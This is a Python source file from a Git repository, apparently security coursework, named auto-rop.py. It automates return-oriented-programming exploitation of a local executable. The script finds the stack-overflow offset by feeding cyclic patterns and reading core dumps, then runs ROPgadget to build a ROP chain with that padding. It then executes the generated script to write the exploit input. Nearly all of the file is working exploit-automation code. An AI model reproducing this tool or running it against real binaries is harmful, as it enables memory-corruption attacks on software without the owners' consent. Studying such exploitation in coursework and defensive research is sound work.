jack/security-cw
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
c26a8387fe
security-cw/auto-rop.py
Liam Dalgarno 1bc6bc2cda Fill in ropchain padding automatically 
Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
2020-11-25 18:55:01 +00:00

88 lines
2.9 KiB
Python
Raw Blame History

from pwnlib.elf.corefile import Coredump
from pwnlib.util.cyclic import cyclic, cyclic_find
from pwnlib.util.packing import pack
from pwnlib.tubes.process import process, signal
import os
import sys
import subprocess
import argparse
from contextlib import redirect_stderr
print(r'''
_ ___ _.--. ___ _____ ______ _____ ______ ______
\`.|\..----...-'` `-._.-'_.-'` / _ \ / ____| /\ |____ / ____| /\ | ____| ____|
/ ' ` , __.--' | | | |_ _| | / \ / / | / \ | |__ | |__
)/' _/ \ `-_, / | | | \ \/ / | / /\ \ / /| | / /\ \ | __| | __|
`-'" `"\_ ,_.-;_.-\_ ', | |_| |> <| |____ / ____ \ / / | |____ / ____ \| | | |____
_.-'_./ {_.' ; / \___//_/\_\\_____/_/ \_\/_/ \_____/_/ \_\_| |______|
{_.-``-' {_/
''')
arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
arg_parser.add_argument("--core", "--c", metavar="core_file", default="core", type=str, help="The name of the generated core file")
arg_parser.add_argument("rop_file", metavar="rop_file", type=str, help="The name of the generated ROP input file")
args = arg_parser.parse_args()
exec_file = args.exec_file
core_file = args.core
rop_file = args.rop_file
def find_offset(exec_file, core_file):
input_file = "input.txt"
try:
os.remove(core_file)
except:
pass
payload_size = 32
while payload_size <= 16384:
print(f"[🤔] Trying payload {payload_size}...")
with open(input_file, "wb") as f:
payload = cyclic(payload_size)
f.write(payload)
process([f"./{exec_file}", input_file]).wait()
try:
with open("/dev/null", "w") as f, redirect_stderr(f):
core = Coredump(f"./{core_file}")
if core and pack(core.eip) in payload:
offset = cyclic_find(core.eip)
print(f"[😳] Found offset at {offset}!")
return offset
except FileNotFoundError:
pass
os.remove(input_file)
payload_size *= 2
raise BaseException("[😞] Failed to find offset.")
offset = find_offset(exec_file, core_file)
print(f"[🤔] Running ROPgadget with offset {offset}...")
result = subprocess.run(
[
"ROPgadget",
"--binary", exec_file,
"--ropchain",
"--silent",
"--paddingLen", str(offset)
],
stdout = subprocess.PIPE
)
with open("script.py", "wb") as f:
f.write(result.stdout)
print(f"[🤔] Running generated script to create ROP input file...")
process(["python3", "script.py", rop_file]).wait()
print(f"[🤩] All done! The ROP input is saved to {rop_file}!")
Reference in New Issue View Git Blame Copy Permalink